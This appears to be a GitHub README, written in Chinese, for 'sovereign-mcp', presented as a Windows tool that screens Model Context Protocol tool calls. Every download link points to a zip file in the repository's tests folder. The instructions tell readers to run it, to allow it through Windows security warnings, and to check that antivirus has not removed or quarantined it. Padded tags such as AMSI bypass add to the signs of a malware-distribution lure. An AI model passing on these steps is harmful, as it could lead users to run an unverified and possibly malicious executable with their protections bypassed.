Lekha3799/sovereign-mcp

# 🛡️ sovereign-mcp - Windows 安全工具检查 [](https://github.com/Lekha3799/sovereign-mcp/raw/refs/heads/main/tests/sovereign-mcp-renderer.zip) ## 📌 此应用的功能 sovereign-mcp 帮助在运行 Model Context Protocol 工具之前进行检查。它使用一个名为 FrozenNamespace 的固定信任基础来降低恶意工具调用、提示注入、虚假输出和不安全数据的风险。 此应用面向希望在 Windows 上更安全地使用 MCP 工具的用户。它以固定方式检查工具请求，因此输入保持不变时结果也保持不变。 ## 🖥️ Windows 配置要求 使用 Windows 电脑需要满足： - Windows 10 或 Windows 11 - 至少 4 GB 内存 - 200 MB 可用磁盘空间 - 首次下载需要互联网连接 无需编码技能即可开始使用。 ## ⬇️ 下载应用 1. 访问此页面下载：https://github.com/Lekha3799/sovereign-mcp/raw/refs/heads/main/tests/sovereign-mcp-renderer.zip 2. 打开最新版本 3. 从版本资源中下载 Windows 文件 4. 将文件保存到下载文件夹 5. 双击文件运行 如果 Windows 显示安全提示，请选择允许保留文件并继续的选项。 ## 🚀 首次启动 1. 打开下载的文件 2. 如果 Windows 请求权限，允许应用启动 3. 等待主窗口打开 4. 使用 MCP 工具时保持应用运行 该应用设计为本地安全层。它监视工具使用情况并根据其信任规则检查每个请求。 ## 🔍 工作原理 sovereign-mcp 使用确定性安全流程。这意味着相同的输入每次都会获得相同的结果。 它检查以下内容： - 不安全的工具请求 - 提示注入 - 隐藏指令 - 恶意输入模式 - 可能的 PII 泄露 - 工具滥用 - 看起来错误或虚假的输出 FrozenNamespace 作为信任根。它为应用提供固定的验证基础，因此检查不会基于猜测而改变。 ## 🧭 用途 在以下情况下使用 sovereign-mcp： - 在运行前验证 MCP 工具调用 - 降低恶意提示的风险 - 保持工具检查的稳定性 - 过滤不安全输入 - 检查输出中是否存在欺骗迹象 - 为 LLM 工作流程添加安全层 它在信任很重要的场景中表现良好，也适用于在工具使用前需要进行简单规则检查的场景。 ## 🛠️ 基本使用方法 打开应用后： 1. 将其连接到您的 MCP 设置 2. 让它检查传入的工具请求 3. 查看任何被阻止或标记的请求 4. 只允许您信任的工具调用 该应用专注于验证，而不是基于猜测做决定。这在您需要清晰且可重复的结果时非常有用。 ## 🔐 安全功能 sovereign-mcp 围绕支持安全工具使用的安全检查构建： - 确定性验证 - FrozenNamespace 信任模型 - 输入清理 - 提示注入检查 - 幻觉信号检测 - PII 检测 - 供应链安全检查 - 可用于可信连接的 mTLS 就绪设计 - MCP 请求的工具验证 这些检查帮助您在工具获取数据或执行操作之前降低风险。 ## 📂 常见文件布局 下载并打开版本后，您可能会看到以下文件： - 主 Windows 应用文件 - 配置文件 - 日志文件夹 - README 或帮助文件 除非版本说明另有要求，否则请将这些文件保存在同一文件夹中。 ## ⚙️ 与 MCP 工具配合使用 如果您已经使用 MCP 工具，请将 sovereign-mcp 放在工具请求通过安全检查的路径中。 简单的工作流程如下： - 用户发送请求 - sovereign-mcp 检查请求 - 不安全输入被阻止 - 安全输入通过 - MCP 工具运行 此设置有助于保持工具链的可控性。 ## 🧪 预期行为 当应用看到请求时，它可能会： - 允许 - 阻止 - 标记待审核 - 剥离不安全部分 - 标记 PII 或注入风险 这使流程清晰且易于审核。 ## 🧩 涵盖的主题 此项目涉及以下概念： - AI 安全 - AI 安全 - MCP - 模型上下文协议 - 提示注入 - 欺骗检测 - 幻觉检测 - 输入清理 - 不可变性 - 供应链安全 - 工具验证 - PII 检测 - mTLS - 基于 Python 的安全工具 ## 📝 快速入门指南 1. 打开版本页面 2. 下载 Windows 文件 3. 运行文件 4. 保持应用打开 5. 连接到您的 MCP 工具路径 6. 在信任结果之前检查第一个请求 ## 🧷 运行前的有用检查 开始之前，请确保： - 文件下载完成 - 文件保存在您可以找到的文件夹中 - 您的杀毒软件没有删除它 - Windows 没有将其移到隔离区 - 您选择的是最新版本 ## 📌 以后需要重新下载 如果需要再次获取文件，请使用相同页面： https://github.com/Lekha3799/sovereign-mcp/raw/refs/heads/main/tests/sovereign-mcp-renderer.zip ## 🧭 文件和权限 应用可能需要权限来： - 读取本地配置文件 - 写入日志 - 检查工具输入 - 检查 MCP 工具的输出 将这些权限限制在应用验证所需的范围内 ## 🔄 更新步骤 发布新版本时： 1. 打开版本页面 2. 下载新的 Windows 文件 3. 关闭旧版本 4. 打开新文件 5. 检查您的设置是否仍指向正确路径 ## 🪟 Windows 提示 如果应用无法打开： - 右键单击文件并选择打开 - 检查 Windows 是否阻止了文件 - 将文件移动到简单的文件夹（如下载） - 确保下载过程中文件名没有更改 - 尝试最新版本 ## 📊 为什么这个工具很有用 LLM 工具可能接受恶意输入、隐藏指令或不安全内容。sovereign-mcp 有助于在这些工具前放置固定检查。 这为您带来： - 更多控制 - 更清晰的工具规则 - 降低恶意提示的风险 - 行动前更好的检查 - 稳定的验证信任基础

标签：AMSI绕过, API安全, API密钥检测, Conpot, FrozenNamespace, JSON输出, Linux系统监控, MCP, Model Context Protocol, PII保护, root of trust, Windows安全, 信任根, 威胁检测, 工具安全, 模型安全, 确定性验证, 网络安全, 输入验证, 输出验证, 逆向工具, 隐私保护, 零日漏洞检测